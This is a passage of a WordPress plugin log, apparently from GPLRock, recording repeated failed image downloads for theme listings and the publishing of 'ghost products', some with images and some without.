. Retrying... [06-Apr-2026 09:19:30 UTC] GPLRock: Image download failed for product derma-clear-beauty-cosmetics-skincare-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/derma-clear---beauty-cosmetics--skincare-wordpress-theme-24627.webp for product derma-clear-beauty-cosmetics-skincare-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:33 UTC] GPLRock: Image download failed for product derma-clear-beauty-cosmetics-skincare-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:35 UTC] GPLRock: Image download failed for product derma-clear-beauty-cosmetics-skincare-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/derma-clear---beauty-cosmetics--skincare-wordpress-theme-24627.webp for product derma-clear-beauty-cosmetics-skincare-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:37 UTC] GPLRock WARNING: Image download failed for product derma-clear-beauty-cosmetics-skincare-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/derma-clear---beauty-cosmetics--skincare-wordpress-theme-24627.webp [06-Apr-2026 09:19:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: derma-clear-beauty-cosmetics-skincare-wordpress-theme [06-Apr-2026 09:19:37 UTC] GPLRock: Image download failed for product julistudio-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:39 UTC] GPLRock: Image download failed for product julistudio-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/julistudio---portfolio--agency-theme-5598.webp for product julistudio-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:42 UTC] GPLRock: Image download failed for product julistudio-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:44 UTC] GPLRock: Image download failed for product julistudio-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/julistudio---portfolio--agency-theme-5598.webp for product julistudio-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:46 UTC] GPLRock WARNING: Image download failed for product julistudio-portfolio-agency-theme. URL: https://meldwp.com/wp-content/uploads/julistudio---portfolio--agency-theme-5598.webp [06-Apr-2026 09:19:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: julistudio-portfolio-agency-theme [06-Apr-2026 09:19:46 UTC] GPLRock: Image download failed for product crust-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:48 UTC] GPLRock: Image download failed for product crust-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crust---multipurpose-wordpress-theme-17120.webp for product crust-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:50 UTC] GPLRock: Image download failed for product crust-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:52 UTC] GPLRock: Image download failed for product crust-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crust---multipurpose-wordpress-theme-17120.webp for product crust-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:54 UTC] GPLRock WARNING: Image download failed for product crust-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crust---multipurpose-wordpress-theme-17120.webp [06-Apr-2026 09:19:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crust-multipurpose-wordpress-theme [06-Apr-2026 09:19:54 UTC] GPLRock: Image download failed for product foodmood-cafe-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:57 UTC] GPLRock: Image download failed for product foodmood-cafe-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodmood---cafe--delivery-wordpress-theme-27412.webp for product foodmood-cafe-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:59 UTC] GPLRock: Image download failed for product foodmood-cafe-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:01 UTC] GPLRock: Image download failed for product foodmood-cafe-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodmood---cafe--delivery-wordpress-theme-27412.webp for product foodmood-cafe-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:20:03 UTC] GPLRock WARNING: Image download failed for product foodmood-cafe-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/foodmood---cafe--delivery-wordpress-theme-27412.webp [06-Apr-2026 09:20:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodmood-cafe-delivery-wordpress-theme [06-Apr-2026 09:20:03 UTC] GPLRock: Image download failed for product vatican-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:05 UTC] GPLRock: Image download failed for product vatican-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vatican---church-wordpress-theme-26178.webp for product vatican-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:20:07 UTC] GPLRock: Image download failed for product vatican-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:10 UTC] GPLRock: Image download failed for product vatican-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vatican---church-wordpress-theme-26178.webp for product vatican-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:20:12 UTC] GPLRock WARNING: Image download failed for product vatican-church-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vatican---church-wordpress-theme-26178.webp [06-Apr-2026 09:20:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vatican-church-wordpress-theme [06-Apr-2026 09:20:12 UTC] GPLRock: Image download failed for product eleos-one-page-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:14 UTC] GPLRock: Image download failed for product eleos-one-page-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eleos---one-page-creative-wordpress-theme-21229.webp for product eleos-one-page-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:20:17 UTC] GPLRock: Image download failed for product eleos-one-page-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:19 UTC] GPLRock: Image download failed for product eleos-one-page-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:20:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eleos---one-page-creative-wordpress-theme-21229.webp for product eleos-one-page-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:20:21 UTC] GPLRock WARNING: Image download failed for product eleos-one-page-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eleos---one-page-creative-wordpress-theme-21229.webp [06-Apr-2026 09:20:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eleos-one-page-creative-wordpress-theme [06-Apr-2026 09:21:28 UTC] GPLRock: Image download failed for product dw-gamez-responsive-wordpress-gaming-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:30 UTC] GPLRock: Image download failed for product dw-gamez-responsive-wordpress-gaming-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dw-gamez---responsive-wordpress-gaming-theme-17658.webp for product dw-gamez-responsive-wordpress-gaming-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:32 UTC] GPLRock: Image download failed for product dw-gamez-responsive-wordpress-gaming-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:34 UTC] GPLRock: Image download failed for product dw-gamez-responsive-wordpress-gaming-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dw-gamez---responsive-wordpress-gaming-theme-17658.webp for product dw-gamez-responsive-wordpress-gaming-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:36 UTC] GPLRock WARNING: Image download failed for product dw-gamez-responsive-wordpress-gaming-theme. URL: https://meldwp.com/wp-content/uploads/dw-gamez---responsive-wordpress-gaming-theme-17658.webp [06-Apr-2026 09:21:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dw-gamez-responsive-wordpress-gaming-theme [06-Apr-2026 09:21:36 UTC] GPLRock: Image download failed for product sagen-single-property-and-apartment-complex-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:38 UTC] GPLRock: Image download failed for product sagen-single-property-and-apartment-complex-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sagen---single-property-and-apartment-complex-wordpress-theme-25478.webp for product sagen-single-property-and-apartment-complex-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:41 UTC] GPLRock: Image download failed for product sagen-single-property-and-apartment-complex-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:43 UTC] GPLRock: Image download failed for product sagen-single-property-and-apartment-complex-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sagen---single-property-and-apartment-complex-wordpress-theme-25478.webp for product sagen-single-property-and-apartment-complex-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:45 UTC] GPLRock WARNING: Image download failed for product sagen-single-property-and-apartment-complex-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sagen---single-property-and-apartment-complex-wordpress-theme-25478.webp [06-Apr-2026 09:21:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sagen-single-property-and-apartment-complex-wordpress-theme [06-Apr-2026 09:21:45 UTC] GPLRock: Image download failed for product adelia-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:47 UTC] GPLRock: Image download failed for product adelia-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adelia---corporate-business-wordpress-theme-31281.webp for product adelia-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:49 UTC] GPLRock: Image download failed for product adelia-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:51 UTC] GPLRock: Image download failed for product adelia-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adelia---corporate-business-wordpress-theme-31281.webp for product adelia-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:53 UTC] GPLRock WARNING: Image download failed for product adelia-corporate-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/adelia---corporate-business-wordpress-theme-31281.webp [06-Apr-2026 09:21:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adelia-corporate-business-wordpress-theme [06-Apr-2026 09:21:54 UTC] GPLRock: Image download failed for product artflow-artist-painter-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:56 UTC] GPLRock: Image download failed for product artflow-artist-painter-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:21:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artflow---artist-painter-portfolio-wordpress-theme-23103.webp for product artflow-artist-painter-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:21:58 UTC] GPLRock: Image download failed for product artflow-artist-painter-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:00 UTC] GPLRock: Image download failed for product artflow-artist-painter-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artflow---artist-painter-portfolio-wordpress-theme-23103.webp for product artflow-artist-painter-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:02 UTC] GPLRock WARNING: Image download failed for product artflow-artist-painter-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artflow---artist-painter-portfolio-wordpress-theme-23103.webp [06-Apr-2026 09:22:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artflow-artist-painter-portfolio-wordpress-theme [06-Apr-2026 09:22:02 UTC] GPLRock: Image download failed for product look-minimal-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:04 UTC] GPLRock: Image download failed for product look-minimal-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/look-minimal-magazine-and-blog-wordpress-theme-31707.webp for product look-minimal-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:07 UTC] GPLRock: Image download failed for product look-minimal-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:09 UTC] GPLRock: Image download failed for product look-minimal-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/look-minimal-magazine-and-blog-wordpress-theme-31707.webp for product look-minimal-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:11 UTC] GPLRock WARNING: Image download failed for product look-minimal-magazine-and-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/look-minimal-magazine-and-blog-wordpress-theme-31707.webp [06-Apr-2026 09:22:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: look-minimal-magazine-and-blog-wordpress-theme [06-Apr-2026 09:22:11 UTC] GPLRock: Image download failed for product ampster-creative-wordpress-theme-for-business-websites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:13 UTC] GPLRock: Image download failed for product ampster-creative-wordpress-theme-for-business-websites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ampster--creative-wordpress-theme-for-business-websites-5394.webp for product ampster-creative-wordpress-theme-for-business-websites after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:15 UTC] GPLRock: Image download failed for product ampster-creative-wordpress-theme-for-business-websites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:18 UTC] GPLRock: Image download failed for product ampster-creative-wordpress-theme-for-business-websites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ampster--creative-wordpress-theme-for-business-websites-5394.webp for product ampster-creative-wordpress-theme-for-business-websites after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:20 UTC] GPLRock WARNING: Image download failed for product ampster-creative-wordpress-theme-for-business-websites. URL: https://meldwp.com/wp-content/uploads/ampster--creative-wordpress-theme-for-business-websites-5394.webp [06-Apr-2026 09:22:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ampster-creative-wordpress-theme-for-business-websites [06-Apr-2026 09:22:20 UTC] GPLRock: Image download failed for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:22 UTC] GPLRock: Image download failed for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autema---quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme-31703.webp for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:24 UTC] GPLRock: Image download failed for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:26 UTC] GPLRock: Image download failed for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autema---quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme-31703.webp for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:28 UTC] GPLRock WARNING: Image download failed for product autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autema---quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme-31703.webp [06-Apr-2026 09:22:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autema-quick-loans-bitcoin-business-coach-and-insurance-agency-wordpress-theme [06-Apr-2026 09:22:28 UTC] GPLRock: Image download failed for product veneno-coronavirus-information-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:31 UTC] GPLRock: Image download failed for product veneno-coronavirus-information-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veneno---coronavirus-information-wordpress-theme-366.webp for product veneno-coronavirus-information-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:33 UTC] GPLRock: Image download failed for product veneno-coronavirus-information-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:35 UTC] GPLRock: Image download failed for product veneno-coronavirus-information-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veneno---coronavirus-information-wordpress-theme-366.webp for product veneno-coronavirus-information-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:37 UTC] GPLRock WARNING: Image download failed for product veneno-coronavirus-information-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/veneno---coronavirus-information-wordpress-theme-366.webp [06-Apr-2026 09:22:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: veneno-coronavirus-information-wordpress-theme [06-Apr-2026 09:22:37 UTC] GPLRock: Image download failed for product milton-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:39 UTC] GPLRock: Image download failed for product milton-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milton--multipurpose-creative-wordpress-theme-24439.webp for product milton-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:41 UTC] GPLRock: Image download failed for product milton-multipurpose-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:43 UTC] GPLRock: Image download failed for product milton-multipurpose-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milton--multipurpose-creative-wordpress-theme-24439.webp for product milton-multipurpose-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:46 UTC] GPLRock WARNING: Image download failed for product milton-multipurpose-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/milton--multipurpose-creative-wordpress-theme-24439.webp [06-Apr-2026 09:22:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: milton-multipurpose-creative-wordpress-theme [06-Apr-2026 09:22:46 UTC] GPLRock: Image download failed for product myway-onepage-bootstrap-parallax-retina-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:48 UTC] GPLRock: Image download failed for product myway-onepage-bootstrap-parallax-retina-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/myway---onepage-bootstrap-parallax-retina-template-6724.webp for product myway-onepage-bootstrap-parallax-retina-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:50 UTC] GPLRock: Image download failed for product myway-onepage-bootstrap-parallax-retina-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:52 UTC] GPLRock: Image download failed for product myway-onepage-bootstrap-parallax-retina-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:22:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/myway---onepage-bootstrap-parallax-retina-template-6724.webp for product myway-onepage-bootstrap-parallax-retina-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:22:54 UTC] GPLRock WARNING: Image download failed for product myway-onepage-bootstrap-parallax-retina-template. URL: https://meldwp.com/wp-content/uploads/myway---onepage-bootstrap-parallax-retina-template-6724.webp [06-Apr-2026 09:22:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: myway-onepage-bootstrap-parallax-retina-template [06-Apr-2026 09:23:14 UTC] GPLRock: Image downloaded successfully for product gatech-cyber-security-it-management-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d03a43d9.webp [06-Apr-2026 09:23:14 UTC] GPLRock: Using pre-downloaded image for product gatech-cyber-security-it-management-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d03a43d9.webp [06-Apr-2026 09:23:14 UTC] GPLRock: Ghost product published with image - Product ID: gatech-cyber-security-it-management-elementor-template-kit [06-Apr-2026 09:23:16 UTC] GPLRock: Image downloaded successfully for product gastros-garage-motorcycle-service-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32709bc4.webp [06-Apr-2026 09:23:16 UTC] GPLRock: Using pre-downloaded image for product gastros-garage-motorcycle-service-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32709bc4.webp [06-Apr-2026 09:23:16 UTC] GPLRock: Ghost product published with image - Product ID: gastros-garage-motorcycle-service-repair-elementor-template-kit [06-Apr-2026 09:23:17 UTC] GPLRock: Image downloaded successfully for product garvest-nature-cottages-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73e24999.webp [06-Apr-2026 09:23:17 UTC] GPLRock: Using pre-downloaded image for product garvest-nature-cottages-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73e24999.webp [06-Apr-2026 09:23:17 UTC] GPLRock: Ghost product published with image - Product ID: garvest-nature-cottages-elementor-template-kit [06-Apr-2026 09:23:19 UTC] GPLRock: Image downloaded successfully for product gadgetin-smartphone-computer-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be2f5d00.webp [06-Apr-2026 09:23:19 UTC] GPLRock: Using pre-downloaded image for product gadgetin-smartphone-computer-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be2f5d00.webp [06-Apr-2026 09:23:19 UTC] GPLRock: Ghost product published with image - Product ID: gadgetin-smartphone-computer-repair-elementor-template-kit [06-Apr-2026 09:23:20 UTC] GPLRock: Image downloaded successfully for product gaco-landscape-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed61e6e3.webp [06-Apr-2026 09:23:20 UTC] GPLRock: Using pre-downloaded image for product gaco-landscape-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed61e6e3.webp [06-Apr-2026 09:23:20 UTC] GPLRock: Ghost product published with image - Product ID: gaco-landscape-gardening-elementor-template-kit [06-Apr-2026 09:23:25 UTC] GPLRock: Image downloaded successfully for product futura-insurance-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-476c570a.webp [06-Apr-2026 09:23:25 UTC] GPLRock: Using pre-downloaded image for product futura-insurance-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-476c570a.webp [06-Apr-2026 09:23:25 UTC] GPLRock: Ghost product published with image - Product ID: futura-insurance-elementor-template-kit [06-Apr-2026 09:23:26 UTC] GPLRock: Image downloaded successfully for product furnityn-interior-design-elementor-kit-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8707ed25.webp [06-Apr-2026 09:23:26 UTC] GPLRock: Using pre-downloaded image for product furnityn-interior-design-elementor-kit-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8707ed25.webp [06-Apr-2026 09:23:26 UTC] GPLRock: Ghost product published with image - Product ID: furnityn-interior-design-elementor-kit-template [06-Apr-2026 09:23:27 UTC] GPLRock: Image downloaded successfully for product furneta-furniture-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1f4bf19.webp [06-Apr-2026 09:23:27 UTC] GPLRock: Using pre-downloaded image for product furneta-furniture-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1f4bf19.webp [06-Apr-2026 09:23:27 UTC] GPLRock: Ghost product published with image - Product ID: furneta-furniture-shop-elementor-template-kit [06-Apr-2026 09:23:29 UTC] GPLRock: Image downloaded successfully for product furnatur-furniture-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f73c0ad4.webp [06-Apr-2026 09:23:29 UTC] GPLRock: Using pre-downloaded image for product furnatur-furniture-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f73c0ad4.webp [06-Apr-2026 09:23:29 UTC] GPLRock: Ghost product published with image - Product ID: furnatur-furniture-ecommerce-elementor-template-kit [06-Apr-2026 09:23:30 UTC] GPLRock: Image downloaded successfully for product funnia-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4f39dd4.webp [06-Apr-2026 09:23:30 UTC] GPLRock: Using pre-downloaded image for product funnia-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4f39dd4.webp [06-Apr-2026 09:23:30 UTC] GPLRock: Ghost product published with image - Product ID: funnia-digital-agency-elementor-template-kit [06-Apr-2026 10:50:30 UTC] GPLRock: Image download failed for product autoglow-car-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:32 UTC] GPLRock: Image download failed for product autoglow-car-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, 